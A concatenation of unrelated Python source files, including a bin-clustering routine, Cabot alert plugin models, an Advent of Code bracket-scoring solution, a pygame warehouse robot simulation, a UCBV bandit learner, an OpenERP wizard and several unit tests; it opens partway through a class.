self.cluster_id = 0 # ID of newest cluster
self.cluster_contents = {} # Dictionary containing sets of bin ids with keys = cluster ids
def join(self,pairs):
""" Join clusters given a tuple (i,j) of bin pairs
"""
for i,j in zip(*pairs):
# Both bins not joined
if self.bin_assign[i] == -1 and self.bin_assign[j] == -1:
# Create new cluster
self.bin_assign[i] = self.cluster_id
self.bin_assign[j] = self.cluster_id
self.cluster_contents[self.cluster_id] = {i,j}
self.cluster_id += 1
rij = self.ratios[i,j]
denom = rij + 1.0
self.bin_data[i] = rij/denom # relative probability for bin i
self.bin_data[j] = denom.recip() # relative probability for bin j
# Only one bin previously assigned to a cluster
elif self.bin_assign[i] == -1 or self.bin_assign[j] == -1:
if self.bin_assign[i] == -1:
idum,jdum = i,j
else:
idum,jdum = j,i
jclust = self.bin_assign[jdum]
jclust_mid = np.where(self.bin_assign == jclust)[0] # index of bins in jclust
rik = self.ratios[idum,jclust_mid]
pk = self.bin_data[jclust_mid]
piTmp = rik * pk # estimate for p_idum / P_cluster based on 'path' through bin k
# Note that here P_cluster is value before addition of bin idum
piTmp_avg = piTmp.weighted_average(axis=0)
# now, compute relative prob of each bin in *new* cluster (including bin idum)
denom = piTmp_avg + 1.0
self.bin_data[idum] = piTmp_avg / denom
# Update bins already in cluster
self.bin_data[jclust_mid] = self.bin_data[jclust_mid] / denom
# Move bin idum into cluster jclust
self.bin_assign[idum] = jclust
self.cluster_contents[jclust].update({idum})
# Both bins previously assigned to different cluster; Join clusters
elif not self.bin_assign[i] == self.bin_assign[j]:
iclust = self.bin_assign[i]
jclust = self.bin_assign[j]
iclust_mid = np.where(self.bin_assign == iclust)[0] # indx of bins in cluster i
jclust_mid = np.where(self.bin_assign == jclust)[0] # indx of bins in cluster j
niclust = iclust_mid.size
njclust = jclust_mid.size
dum_data = np.zeros((niclust*njclust,))
ij_cluster_ratio = UncertMath.UncertContainer(dum_data.copy(),dum_data.copy(),dum_data.copy())
for count,im in enumerate(iclust_mid):
rij = self.ratios[im,jclust_mid]
pi = self.bin_data[im]
pj = self.bin_data[jclust_mid]
ij_cluster_ratio[count*njclust:(count+1)*njclust] = rij * pj / pi
ij_cluster_ratio = ij_cluster_ratio.weighted_average(axis=0)
idenom = ij_cluster_ratio.recip() + 1.0
jdenom = ij_cluster_ratio + 1.0
self.bin_data[iclust_mid] = self.bin_data[iclust_mid] / idenom
self.bin_data[jclust_mid] = self.bin_data[jclust_mid] / jdenom
# Join all bins in cluster j into cluster iclust
self.bin_assign[jclust_mid] = iclust
# Move contents of jclust into iclust
self.cluster_contents[iclust].update(self.cluster_contents[jclust])
# Clear contents of jclust
self.cluster_contents[jclust].clear()
if len(self.cluster_contents[iclust]) == self.nbins:
break
def join_simple(self,pairs):
""" Join clusters using direct ratios given a tuple (i,j) of bin pairs
"""
for i,j in zip(*pairs):
# Both bins not joined
if self.bin_assign[i] == -1 and self.bin_assign[j] == -1:
# Create new cluster
self.bin_assign[i] = self.cluster_id
self.bin_assign[j] = self.cluster_id
self.cluster_contents[self.cluster_id] = {i,j}
self.cluster_id += 1
rij = self.ratios[i,j]
denom = rij + 1.0
self.bin_data[i] = rij/denom # relative probability for bin i
self.bin_data[j] = denom.recip() # relative probability for bin j
# Only one bin previously assigned to a cluster
elif self.bin_assign[i] == -1 or self.bin_assign[j] == -1:
if self.bin_assign[i] == -1:
idum,jdum = i,j
else:
idum,jdum = j,i
jclust = self.bin_assign[jdum]
rik = self.ratios[idum,jdum]
pk = self.bin_data[jdum]
piTmp = rik * pk # estimate for p_idum / P_cluster based on 'path' through bin k
# Note that here P_cluster is value before addition of bin idum
# now, compute relative prob of each bin in *new* cluster (including bin idum)
denom = piTmp + 1.0
self.bin_data[idum] = piTmp / denom
# Update bins already in cluster
jclust_mid = np.where(self.bin_assign == jclust) # index of bins in jclust
self.bin_data[jclust_mid] = self.bin_data[jclust_mid] / denom
# Move bin idum into cluster jclust
self.bin_assign[idum] = jclust
self.cluster_contents[jclust].update({idum})
# Both bins previously assigned to different cluster; Join clusters
elif not self.bin_assign[i] == self.bin_assign[j]:
iclust = self.bin_assign[i]
jclust = self.bin_assign[j]
rij = self.ratios[i,j]
pi = self.bin_data[i]
pj = self.bin_data[j]
ij_cluster_ratio = rij * pj / pi
idenom = ij_cluster_ratio.recip() + 1.0
jdenom = ij_cluster_ratio + 1.0
iclust_mid = np.where(self.bin_assign == iclust)
self.bin_data[iclust_mid] = self.bin_data[iclust_mid] / idenom
jclust_mid = np.where(self.bin_assign == jclust)
self.bin_data[jclust_mid] = self.bin_data[jclust_mid] / jdenom
# Join all bins in cluster j into cluster iclust
self.bin_assign[jclust_mid] = iclust
# Move contents of jclust into iclust
self.cluster_contents[iclust].update(self.cluster_contents[jclust])
# Clear contents of jclust
self.cluster_contents[jclust].clear()
if len(self.cluster_contents[iclust]) == self.nbins:
break
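# Editor sketch (hypothetical usage, not part of the original module); the
# UncertContainer layout is assumed from its use above (three equally shaped arrays):
#
#     nbins = 4
#     vals = np.ones((nbins, nbins))
#     ratios = UncertMath.UncertContainer(vals.copy(), vals.copy(), vals.copy())
#     clusters = ClusterList(ratios, nbins)
#     clusters.join((np.array([0, 2]), np.array([1, 3])))  # merge bins (0,1) and (2,3)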
|
import logging
from django.db import models
from polymorphic.models import PolymorphicModel
from cabot.cabotapp.utils import create_failing_service_mock
logger = logging.getLogger(__name__)
class AlertPlugin(PolymorphicModel):
title = models.CharField(max_length=30, unique=True, editable=False)
enabled = models.BooleanField(default=True)
author = None
# Plugins use name field
name = 'noop'
def __unicode__(self):
return u'%s' % (self.title)
def send_alert(self, service, users, duty_officers):
"""
Implement a send_alert function here that shall be called.
"""
return True
def send_test_alert(self, user):
"""
Send a test alert when the user requests it (to make sure config is valid).
The default implementation creates a fake Service and StatusCheck and calls the normal send_alert().
Note that the service/check may not be fully configured (e.g. invalid primary key, no HipChat room ID, ...).
:param user: django user
:return: nothing, raise exceptions on error
"""
service_mock = create_failing_service_mock()
self.send_alert(service_mock, [], [user])
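# Editor sketch (hypothetical, not part of cabot): a minimal AlertPlugin subclass
# only needs a unique `name` and a `send_alert` implementation, e.g.
#
#     class LoggingAlertPlugin(AlertPlugin):
#         name = 'logging'
#
#         def send_alert(self, service, users, duty_officers):
#             logger.info('Service %s would alert %d users', service.name, len(users))
#             return True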
class AlertPluginUserData(PolymorphicModel):
title = models.CharField(max_length=30, editable=False)
user = models.ForeignKey('UserProfile', editable=False, on_delete=models.CASCADE)
# This is used to add the "Send Test Alert" button to the edit page.
# We need this information to be able to map AlertPluginUserData subclasses to their AlertPlugins.
# It's a list because some plugins (like Twilio) have multiple alert types for one user data type.
alert_classes = []
class Meta:
unique_together = ('title', 'user',)
def __unicode__(self):
return u'%s' % (self.title)
def is_configured(self):
"""
Override this to show warnings in the profile sidebar when something's not set up (i.e. a field is empty).
NOTE: This does NOT do validation when submitting the 'update profile' form. You should specify
models.SomeField(validators=[...]) when declaring your model's fields for that.
"""
return True
def send_alert(service, duty_officers=[], fallback_officers=[]):
users = service.users_to_notify.filter(is_active=True)
for alert in service.alerts.all():
try:
alert.send_alert(service, users, duty_officers)
except Exception:
            logging.exception('Could not send {} alert'.format(alert.name))
if fallback_officers:
try:
alert.send_alert(service, users, fallback_officers)
except Exception:
logging.exception('Could not send {} alert to fallback officer'.format(alert.name))
def update_alert_plugins():
for plugin_subclass in AlertPlugin.__subclasses__():
plugin_subclass.objects.get_or_create(title=plugin_subclass.name)
return AlertPlugin.objects.all()
|
from statistics import median
map_open_close = {"{": "}", "[": "]", "(": ")", "<": ">"}
score_part_1 = {
"}": 1197,
"]": 57,
")": 3,
">": 25137,
}
score_part_2 = {
"}": 3,
"]": 2,
")": 1,
">": 4,
}
def score_line(line: str) -> tuple[int, int]:
"""if the line is corrupted, then compute score of part 1, else compute score of part 2"""
stack = []
for c in line:
if c in map_open_close:
stack.append(c)
else:
try:
e = stack.pop()
except IndexError:
return score_part_1[c], 0
if map_open_close[e] != c:
return score_part_1[c], 0
# complete string
s = 0
for e in stack[::-1]:
s *= 5
s += score_part_2[map_open_close[e]]
return 0, s
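# Editor sanity check (not part of the original solution), traced by hand:
# "(]" is corrupted at "]" (57 points); "((" is incomplete, completes to "))",
# giving a completion score of (0 * 5 + 1) * 5 + 1 = 6.
assert score_line("(]") == (57, 0)
assert score_line("((") == (0, 6)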
score_1 = 0
scores_2 = []
with open("input.txt") as f:
for line in f.readlines():
s1, s2 = score_line(line.strip())
score_1 += s1
if s2 != 0:
scores_2.append(s2)
print("part1:", score_1)
print("part2:", median(scores_2))
|
from dataclasses import dataclass
from typing import ClassVar
import datetime
@dataclass
class Some_Class:
some_const: ClassVar[int] = 20
some_int: int
some_float: float
some_float_less_than_3: float
some_datetime: datetime.datetime
some_use_of_const: int
def __post_init__(self):
"""our class consistency checks to be performed after initialization."""
        # An assert would be stripped when Python runs with -O (optimized mode), so raise explicitly instead of:
        # assert self.some_float_less_than_3 < 3, f"got {self.some_float_less_than_3} for some_float_less_than_3"
        if self.some_float_less_than_3 >= 3:
            raise RuntimeError(
                f"got {self.some_float_less_than_3} for some_float_less_than_3"
            )
some_class_instance = Some_Class(
some_int = 1,
some_float = 3.14,
some_float_less_than_3 = 2.4,
some_datetime = datetime.datetime.fromtimestamp(42),
some_use_of_const = Some_Class.some_const * 4
)
print(some_class_instance)
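# Editor sketch (not part of the original demo): how a caller might handle the
# consistency failure instead of letting it propagate.
try:
    Some_Class(
        some_int = 1,
        some_float = 3.14,
        some_float_less_than_3 = 3.4,
        some_datetime = datetime.datetime.fromtimestamp(42),
        some_use_of_const = Some_Class.some_const * 4,
    )
except RuntimeError as err:
    print("validation failed:", err)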
some_class_instance_erroneous = Some_Class(
    some_int = 1,
    some_float = 3.14,
    some_float_less_than_3 = 3.4,
    some_datetime = datetime.datetime.fromtimestamp(42),
    some_use_of_const = Some_Class.some_const * 4  # was missing, which raised TypeError before the intended check
)
print(some_class_instance_erroneous)  # never reached: __post_init__ raises RuntimeError above
|
"""使用Python实现选择排序,并分析时间复杂度"""
#时间复杂度:O(n**2)
def selection_sort(lst):
for i in range(len(lst) - 1):
min_index = i
for j in range(i + 1, len(lst)):
if lst[j] < lst[min_index]:
min_index = j
if min_index != i:
lst[i], lst[min_index] = lst[min_index], lst[i]
li = [45, 234, 34, 34, 9, 3465, 234, 1]
print("origin lst", li)
selection_sort(li)
print("selection_sort_list", li)
|
# -*- coding: utf-8 -*-
"""Implements a simple wrapper around urlopen."""
import logging
from functools import lru_cache
from http.client import HTTPResponse
from typing import Iterable, Dict, Optional
from urllib.request import Request
from urllib.request import urlopen
logger = logging.getLogger(__name__)
def _execute_request(
url: str, method: Optional[str] = None, headers: Optional[Dict[str, str]] = None
) -> HTTPResponse:
base_headers = {"User-Agent": "Mozilla/5.0"}
if headers:
base_headers.update(headers)
if url.lower().startswith("http"):
request = Request(url, headers=base_headers, method=method)
else:
raise ValueError("Invalid URL")
return urlopen(request) # nosec
def get(url: str) -> str:
    """Send an HTTP GET request.
:param str url:
The URL to perform the GET request for.
:rtype: str
:returns:
UTF-8 encoded string of response
"""
return _execute_request(url).read().decode("utf-8")
def stream(
url: str, chunk_size: int = 4096, range_size: int = 9437184
) -> Iterable[bytes]:
"""Read the response in chunks.
:param str url: The URL to perform the GET request for.
:param int chunk_size: The size in bytes of each chunk. Defaults to 4KB
:param int range_size: The size in bytes of each range request. Defaults to 9MB
:rtype: Iterable[bytes]
"""
file_size: int = range_size # fake filesize to start
downloaded = 0
while downloaded < file_size:
stop_pos = min(downloaded + range_size, file_size) - 1
range_header = f"bytes={downloaded}-{stop_pos}"
response = _execute_request(url, method="GET", headers={"Range": range_header})
if file_size == range_size:
try:
content_range = response.info()["Content-Range"]
file_size = int(content_range.split("/")[1])
except (KeyError, IndexError, ValueError) as e:
logger.error(e)
while True:
chunk = response.read(chunk_size)
if not chunk:
break
downloaded += len(chunk)
yield chunk
return # pylint: disable=R1711
@lru_cache(maxsize=None)
def filesize(url: str) -> int:
"""Fetch size in bytes of file at given URL
:param str url: The URL to get the size of
:returns: int: size in bytes of remote file
"""
return int(head(url)["content-length"])
def head(url: str) -> Dict:
"""Fetch headers returned http GET request.
:param str url:
The URL to perform the GET request for.
:rtype: dict
:returns:
dictionary of lowercase headers
"""
response_headers = _execute_request(url, method="HEAD").info()
return {k.lower(): v for k, v in response_headers.items()}
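# Editor sketch (hypothetical URL and filename, not from the original): stream()
# yields the remote file in chunks, so callers can write it to disk incrementally:
#
#     with open("video.mp4", "wb") as fh:
#         for chunk in stream("https://example.com/video.mp4"):
#             fh.write(chunk)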
|
from math import pi, sin, cos
import random
import pygame
from level import TILE_SIZE, CHARGERS_PER_STATION, tilepos_to_screenpos
from level import NORTH, EAST, SOUTH, WEST
from sensor import tiles_to
from main import FRAME_RATE
texture = pygame.image.load("res/robot{}.png".format(TILE_SIZE))
texture_unloading = pygame.image.load("res/robot_unloading{}.png".format(TILE_SIZE))
texture_loaded = pygame.image.load("res/robot_loaded{}.png".format(TILE_SIZE))
class Processor(object):
BATTERY_LOW = 0.5
BATTERY_HIGH = 1.0
def __init__(self, robot):
self.robot = robot
self.robot.processor = self
self.state = 'charging'
self.chargeport_pos = self.robot.rect.left//3*3, self.robot.rect.bottom
self.station_entrance_pos = self.chargeport_pos[0] + 1, 0
self.station_exit_pos = self.chargeport_pos[0] + 2, 0
def tick(self):
if self.state == 'charging':
self.robot.battery += 0.12 / FRAME_RATE
if self.robot.battery >= Processor.BATTERY_HIGH:
self.enque()
def enque(self):
self.robot.driveTo(self.station_exit_pos)
self.state = 'queueing'
def arrived(self):
if self.state == 'queueing':
self.deliver()
elif self.state == 'delivering':
self.robot.loaded = False
self.robot.unload()
elif self.state == 'returning_to_station':
if self.robot.battery < Processor.BATTERY_LOW:
self.charge()
else:
self.enque()
elif self.state == 'returning_to_charging':
self.state = 'charging'
def charge(self):
self.robot.driveTo(self.chargeport_pos)
self.state = 'returning_to_charging'
def return_to_station(self):
self.state = 'returning_to_station'
self.robot.driveTo(self.station_entrance_pos)
def unloaded(self):
self.return_to_station()
def deliver(self):
self.state = 'delivering'
self.robot.loaded = True
x = 0 + 3 * random.randint(0,12)
y = 1 + 3 * random.randint(1,CHARGERS_PER_STATION)
self.robot.driveTo((x,y))
class Robot(object):
ROBOCOUNT = 0
def __init__(self, x, y):
self.rect = pygame.Rect(x, y-1, 1, 1)
self.state = "stopped"
self.offset = [0,0]
self.heading = 0
self.unloading = False
self.moving = False
self.target = None
self.moves = []
self.data = None
self.processor = Processor(self)
Robot.ROBOCOUNT += 1
self.id = Robot.ROBOCOUNT
self.loaded = False
self.battery = 0.8
self.speed = 4.0 # tiles per second
self.unload_time = 0.5 # seconds
def __str__(self):
return "Robot {}".format(self.id)
def draw(self, screen, viewport):
if self.target:
self._draw_line_to(screen, viewport, self.target, (250,250,250))
x, y = self.rect.left, self.rect.bottom
x += self.offset[0]
y += self.offset[1]
rx, ry = tilepos_to_screenpos((x,y), viewport)
rect = pygame.Rect(rx, ry, TILE_SIZE, TILE_SIZE)
t = texture
if self.unloading:
t = texture_unloading
elif self.loaded:
t = texture_loaded
surface = pygame.transform.rotate(t, self.heading)
srect = surface.get_rect()
srect.center = rect.center
screen.blit(surface, srect)
pygame.draw.arc(screen, (250,250,250), rect.inflate(-16,-16), 0, max(0,self.battery)*2*pi, 4)
# if self.data.blocked_crossroad_ahead: pygame.draw.circle(screen, (255,0,0), (rx+16,ry+16), 8, 2)
def _draw_line_to(self, screen, viewport, pos, color):
rx, ry = self.rect.left, self.rect.bottom
rx += self.offset[0] + 0.5
ry += self.offset[1] - 0.5
rx, ry = tilepos_to_screenpos((rx,ry), viewport)
tx, ty = pos[0] + 0.5, pos[1] - 0.5
tx, ty = tilepos_to_screenpos((tx,ty), viewport)
pygame.draw.line(screen, color, (rx,ry), (tx,ty))
def tick(self):
self.processor.tick()
self.moving = len(self.moves) > 0
if len(self.moves):
finished = self.moves[0].tick(self)
if finished:
self.battery -= 0.005
del self.moves[0]
self.offset[0] = round(self.offset[0])
self.offset[1] = round(self.offset[1])
dx, self.offset[0] = self.offset[0] // 1, self.offset[0] % 1
dy, self.offset[1] = self.offset[1] // 1, self.offset[1] % 1
self.rect.move_ip(dx, dy)
def driveForward(self):
def forward(robot, data):
steps, remaining = data
if robot.heading == NORTH:
robot.offset[1] = 1 - remaining/steps
elif robot.heading == WEST:
robot.offset[0] = -1 + remaining/steps
elif robot.heading == SOUTH:
robot.offset[1] = -1 + remaining/steps
elif robot.heading == EAST:
robot.offset[0] = 1 - remaining/steps
return remaining==0, (steps, remaining -1 )
steps = FRAME_RATE // self.speed
self.moves.append(Move(forward, (steps, steps)))
def turnLeft(self):
steps = FRAME_RATE // self.speed
def left(robot, data):
steps, remaining = data
robot.heading += 90 / steps
if remaining == 1:
robot.heading = round(robot.heading) % 360
return remaining==1, (steps, remaining -1 )
self.moves.append(Move(left, (steps, steps)))
def turnRight(self):
steps = FRAME_RATE // self.speed
def right(robot, data):
steps, remaining = data
robot.heading -= 90 / steps
if remaining == 1:
robot.heading = round(robot.heading) % 360
return remaining==1, (steps, remaining -1 )
self.moves.append(Move(right, (steps, steps)))
def start_unloading(self):
steps = FRAME_RATE * self.unload_time
def unload(robot, data):
steps, remaining = data
if steps == remaining:
robot.unloading = True
elif remaining == 1:
robot.unloading = False
robot.unloaded()
return True, (steps, remaining -1 )
return False, (steps, remaining -1 )
self.moves.append(Move(unload, (steps, steps)))
def driveTo(self, target):
if self.state != 'stopped':
return
self.target = target
self.state = 'driving.initial'
def unloaded(self):
if self.state == 'unloading':
self.state = 'stopped'
self.processor.unloaded()
def unload(self):
# movements are blocking
if self.moving:
return
if self.state == 'stopped':
self.start_unloading()
self.state = 'unloading'
def sensorData(self, data):
self.data = data
# movements are blocking
if self.moving:
return
if self.state == 'stopped':
pass
elif self.state == 'unloading':
pass
elif self.state == 'driving.initial':
if self._target_reached():
self.state = 'stopped'
self.target = None
self.processor.arrived()
else:
if data.pos_type == 'waypoint':
self.state = 'driving.waypoint.initial'
elif data.pos_type == 'station':
self._station_behavior()
elif self.state.startswith('driving.waypoint'):
return self._states_waypoint()
else:
print("unknown state", self.state)
def _station_behavior(self):
to_charging_below = self.target[0]%3 ==0 and self.target[0] + 1 == self.data.pos[0] and self.target[1] <= self.data.pos[1]
if to_charging_below:
if self.data.pos[1] == self.target[1] and self.data.pos_orientation != WEST:
self.turnRight()
elif not self.data.blocked_front:
self.driveForward()
else:
direction, left = self._station_traffic_direction()
if self.data.pos_orientation != direction:
if left:
self.turnLeft()
else:
self.turnRight()
elif not self.data.blocked_front:
self.driveForward()
def _station_traffic_direction(self):
""" return tuple of which direction to go and wether to use left turns for doing so (else use right turns) """
xmod3 = self.data.pos[0] % 3
if xmod3 == 0 or self.data.pos[1] == -2-CHARGERS_PER_STATION and xmod3 == 1:
return EAST, True
elif xmod3 == 1:
return SOUTH, False
else:
return NORTH, True
def _states_waypoint(self):
direction = self._target_direction()
if self.state == 'driving.waypoint.initial':
if direction == 'behind':
if self.data.blocked_left:
self.state = 'driving.waypoint.checkpriority'
else:
self.turnLeft()
self.state = 'driving.waypoint.turnaround.wait'
else:
self.state = 'driving.waypoint.checkpriority'
elif self.state == 'driving.waypoint.turnaround.wait':
if not (self.data.blocked_crossroad_right or self.data.blocked_front):
self.driveForward()
self.turnLeft()
else:
self.turnRight()
self.state = 'driving.initial'
elif self.state == 'driving.waypoint.checkpriority':
right_before_left = not self.data.blocked_waypoint_right
stalemate = self.data.blocked_waypoint_right and self.data.blocked_waypoint_ahead and self.data.blocked_waypoint_left and self.data.pos_orientation in [NORTH, SOUTH]
crossroad_free = not self.data.blocked_crossroad_ahead
if (right_before_left or stalemate) and crossroad_free:
self.driveForward()
if direction == 'right':
self.turnRight()
self.state = 'driving.waypoint.leavecrossroad'
elif direction == 'ahead' or direction == 'behind':
self.driveForward()
self.state = 'driving.waypoint.leavecrossroad'
elif direction == 'left':
self.driveForward()
self.turnLeft()
self.state = 'driving.waypoint.finishleftturn'
elif self.state == 'driving.waypoint.finishleftturn':
if not self.data.blocked_front:
self.driveForward()
self.state = 'driving.waypoint.leavecrossroad'
elif self.state == 'driving.waypoint.leavecrossroad':
if not self.data.blocked_front:
self.driveForward()
self.state = 'driving.initial'
else:
self.turnLeft()
self.state = 'driving.waypoint.finishleftturn'
def _target_reached(self):
return self.target == self.data.pos
def _target_direction(self):
tx, ty= tiles_to(self.data.pos, self.heading, self.target)
result = None
if ty > 3 or ty == 3 and tx in [-1, 0]:
result = 'ahead'
elif ty == 0 and tx == -1:
result = 'behind'
elif ty < 0:
result = 'behind'
elif tx > 0:
result = 'right'
elif tx < -1:
result = 'left'
return result
class Move(object):
function = None
data = None
def __init__(self, function, initial_data):
self.function = function
self.data = initial_data
def tick(self, robot):
"""return true when finished"""
finished, new_data = self.function(robot, self.data)
self.data = new_data
return finished
|
from typing import List, Tuple, Optional
import numpy as np
from banditpylib.arms import PseudoArm
from .utils import OrdinaryLearner
class UCBV(OrdinaryLearner):
r"""UCBV policy :cite:`audibert2009exploration`
At time :math:`t`, play arm
.. math::
\mathrm{argmax}_{i \in [0, N-1]} \left\{ \hat{\mu}_i(t) + \sqrt{ \frac{ 2
\hat{V}_i(t) \ln(t) }{T_i(t)} }+ \frac{ b \ln(t) }{T_i(t)} \right\}
.. note::
Reward has to be bounded within :math:`[0, b]`.
"""
def __init__(self, arm_num: int, horizon: int,
name: str = None, b: float = 1.0):
"""
Args:
arm_num: number of arms
horizon: total number of time steps
name: alias name
b: upper bound of reward
"""
super().__init__(arm_num=arm_num, horizon=horizon, name=name)
if b <= 0:
      raise Exception('%s: b is set to %.2f, which is not positive!' %
                      (self.name, b))
self.__b = b
def _name(self) -> str:
"""
Returns:
default learner name
"""
return 'ucbv'
def reset(self):
"""Reset the learner
.. warning::
This function should be called before the start of the game.
"""
self.__pseudo_arms = [PseudoArm() for arm_id in range(self.arm_num())]
# current time step
self.__time = 1
def UCBV(self) -> np.ndarray:
"""
Returns:
optimistic estimate of arms' real means using empirical variance
"""
ucbv = [
arm.em_mean +
np.sqrt(2 * arm.em_var * np.log(self.__time) / arm.total_pulls()) +
self.__b * np.log(self.__time) / arm.total_pulls()
for arm in self.__pseudo_arms
]
return ucbv
def actions(self, context=None) -> Optional[List[Tuple[int, int]]]:
"""
Args:
context: context of the ordinary bandit which should be `None`
Returns:
arms to pull
"""
del context
if self.__time > self.horizon():
self.__last_actions = None
elif self.__time <= self.arm_num():
self.__last_actions = [((self.__time - 1) % self.arm_num(), 1)]
else:
self.__last_actions = [(np.argmax(self.UCBV()), 1)]
return self.__last_actions
def update(self, feedback: List[Tuple[np.ndarray, None]]):
"""Learner update
Args:
feedback: feedback returned by the bandit environment by executing
:func:`actions`
"""
self.__pseudo_arms[self.__last_actions[0][0]].update(feedback[0][0])
self.__time += 1
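# Editor sketch (not part of the original policy): the UCBV index from the class
# docstring restated with plain numpy for a single arm, using the empirical
# quantities the policy tracks via PseudoArm.
def _ucbv_index_sketch(em_mean: float, em_var: float, pulls: int, t: int, b: float = 1.0) -> float:
    """Return em_mean + sqrt(2 * em_var * ln(t) / pulls) + b * ln(t) / pulls."""
    return em_mean + np.sqrt(2 * em_var * np.log(t) / pulls) + b * np.log(t) / pulls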
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields, osv
from openerp.osv.orm import browse_record, browse_null
from openerp.tools.translate import _
class purchase_requisition_partner(osv.osv_memory):
_name = "purchase.requisition.partner"
_description = "Purchase Requisition Partner"
_columns = {
        'partner_id': fields.many2one('res.partner', 'Supplier', required=True, domain=[('supplier', '=', True)]),
}
def view_init(self, cr, uid, fields_list, context=None):
if context is None:
context = {}
res = super(purchase_requisition_partner, self).view_init(cr, uid, fields_list, context=context)
record_id = context and context.get('active_id', False) or False
tender = self.pool.get('purchase.requisition').browse(cr, uid, record_id, context=context)
if not tender.line_ids:
raise osv.except_osv(_('Error!'), _('No Product in Tender.'))
return res
def create_order(self, cr, uid, ids, context=None):
active_ids = context and context.get('active_ids', [])
data = self.browse(cr, uid, ids, context=context)[0]
self.pool.get('purchase.requisition').make_purchase_order(cr, uid, active_ids, data.partner_id.id, context=context)
return {'type': 'ir.actions.act_window_close'}
purchase_requisition_partner()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from six.moves import http_client
import st2common.validators.api.action as action_validator
from st2common.models.db.auth import UserDB
from st2common.persistence.auth import User
from st2common.models.db.rbac import RoleDB
from st2common.models.db.rbac import UserRoleAssignmentDB
from st2common.persistence.rbac import UserRoleAssignment
from st2common.persistence.rbac import Role
from st2common.transport.publishers import PoolPublisher
from tests.base import APIControllerWithRBACTestCase
from tests.base import BaseActionExecutionControllerTestCase
from st2tests.fixturesloader import FixturesLoader
FIXTURES_PACK = 'generic'
TEST_FIXTURES = {
'runners': ['testrunner1.yaml'],
'actions': ['action1.yaml', 'local.yaml']
}
@mock.patch.object(PoolPublisher, 'publish', mock.MagicMock())
class ActionExecutionRBACControllerTestCase(BaseActionExecutionControllerTestCase,
APIControllerWithRBACTestCase):
fixtures_loader = FixturesLoader()
@mock.patch.object(action_validator, 'validate_action', mock.MagicMock(
return_value=True))
def setUp(self):
super(ActionExecutionRBACControllerTestCase, self).setUp()
self.fixtures_loader.save_fixtures_to_db(fixtures_pack=FIXTURES_PACK,
fixtures_dict=TEST_FIXTURES)
# Insert mock users, roles and assignments
# Users
user_1_db = UserDB(name='multiple_roles')
user_1_db = User.add_or_update(user_1_db)
self.users['multiple_roles'] = user_1_db
# Roles
roles = ['role_1', 'role_2', 'role_3']
for role in roles:
role_db = RoleDB(name=role)
Role.add_or_update(role_db)
# Role assignments
user_db = self.users['multiple_roles']
role_assignment_db = UserRoleAssignmentDB(
user=user_db.name,
role='admin',
source='assignments/%s.yaml' % user_db.name)
UserRoleAssignment.add_or_update(role_assignment_db)
for role in roles:
role_assignment_db = UserRoleAssignmentDB(
user=user_db.name,
role=role,
source='assignments/%s.yaml' % user_db.name)
UserRoleAssignment.add_or_update(role_assignment_db)
def test_post_rbac_info_in_context_success(self):
# When RBAC is enabled, additional RBAC related info should be included in action_context
data = {
'action': 'wolfpack.action-1',
'parameters': {
'actionstr': 'foo'
}
}
# User with one role assignment
user_db = self.users['admin']
self.use_user(user_db)
resp = self._do_post(data)
self.assertEqual(resp.status_int, 201)
expected_context = {
'pack': 'wolfpack',
'user': 'admin',
'rbac': {
'user': 'admin',
'roles': ['admin']
}
}
self.assertEqual(resp.json['context'], expected_context)
# User with multiple role assignments
user_db = self.users['multiple_roles']
self.use_user(user_db)
resp = self._do_post(data)
self.assertEqual(resp.status_int, 201)
expected_context = {
'pack': 'wolfpack',
'user': 'multiple_roles',
'rbac': {
'user': 'multiple_roles',
'roles': ['admin', 'role_1', 'role_2', 'role_3']
}
}
self.assertEqual(resp.json['context'], expected_context)
def test_get_all_limit_minus_one(self):
user_db = self.users['observer']
self.use_user(user_db)
resp = self.app.get('/v1/actionexecutions?limit=-1', expect_errors=True)
self.assertEqual(resp.status_code, http_client.FORBIDDEN)
user_db = self.users['admin']
self.use_user(user_db)
resp = self.app.get('/v1/actionexecutions?limit=-1')
self.assertEqual(resp.status_code, http_client.OK)
|
#!/usr/bin/env python
import twder
import unittest
import datetime
class TestStringMethods(unittest.TestCase):
def all_element_is_str(self, container):
for e in container:
self.assertIsInstance(e, str)
def check_range_result(self, range_result):
        self.assertIsInstance(range_result, list)
        # map() is lazy in Python 3, so the assertions would never run; iterate explicitly instead
        for element in range_result:
            self.all_element_is_str(element)
def test_currencies(self):
ret = twder.currencies()
self.assertIsInstance(ret, list)
self.all_element_is_str(ret)
def test_currency_name_dict(self):
ret = twder.currency_name_dict()
currencies = twder.currencies()
for c in currencies:
self.assertIn(c, ret)
self.assertIsInstance(ret[c], str)
def test_now_all(self):
twder.now_all()
def test_now(self):
ret = twder.now("JPY")
self.assertIsInstance(ret, tuple)
self.all_element_is_str(ret)
def test_pastday(self):
ret = twder.past_day("JPY")
self.check_range_result(ret)
def test_past_six_month(self):
ret = twder.past_six_month("JPY")
self.check_range_result(ret)
def test_specify_month(self):
now = datetime.datetime.now() - datetime.timedelta(days=31)
ret = twder.specify_month("JPY", now.year, now.month)
self.check_range_result(ret)
if __name__ == "__main__":
unittest.main()
|
from django.contrib import admin
from .models import LearningResources
@admin.register(LearningResources)
class ArticleAdmin(admin.ModelAdmin):
list_display = ['title', 'order', 'url', 'desc']
list_editable = ['order']
|
"""
.. module:: test_datautil
:synopsis: Unit tests for datautil module
"""
import pytest
